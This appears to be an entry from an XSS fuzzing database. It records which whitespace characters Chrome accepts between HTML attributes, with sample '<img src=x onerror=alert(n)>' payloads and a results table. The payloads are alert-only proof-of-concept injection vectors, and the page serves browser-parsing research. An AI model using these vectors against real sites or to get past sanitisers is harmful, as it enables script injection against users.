Characters allowed between multiple HTML attributes
5
This vector shows what characters can be used to separate HTML attributes, also allowing multiple attributes
Created by: JorianWoltjer
Created on: Thursday, September 12, 2024 at 5:10:00 PM
Updated on: Sunday, September 29, 2024 at 8:14:05 PM
Vector type: XSS
Template used:
<img$[chr]src=x$[chr]onerror=log($[i])>
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<img src=x onerror=alert(9)>
<img
src=x
onerror=alert(10)>
<imgsrc=xonerror=alert(12)>
<img
src=x
onerror=alert(13)>
<img src=x onerror=alert(32)>
Fuzz results
Chrome 128.0.0.0 desktop Windows NT 10.0
Updated
Thu Sep 12 2024
Found 5 results
Dec | Hex | Chr |
---|---|---|
9 | 09 | HT |
Dec | Hex | Chr |
---|---|---|
10 | 0a | LF |
Dec | Hex | Chr |
---|---|---|
12 | 0c | FF |
Dec | Hex | Chr |
---|---|---|
13 | 0d | CR |
Dec | Hex | Chr |
---|---|---|
32 | 20 | SPACE |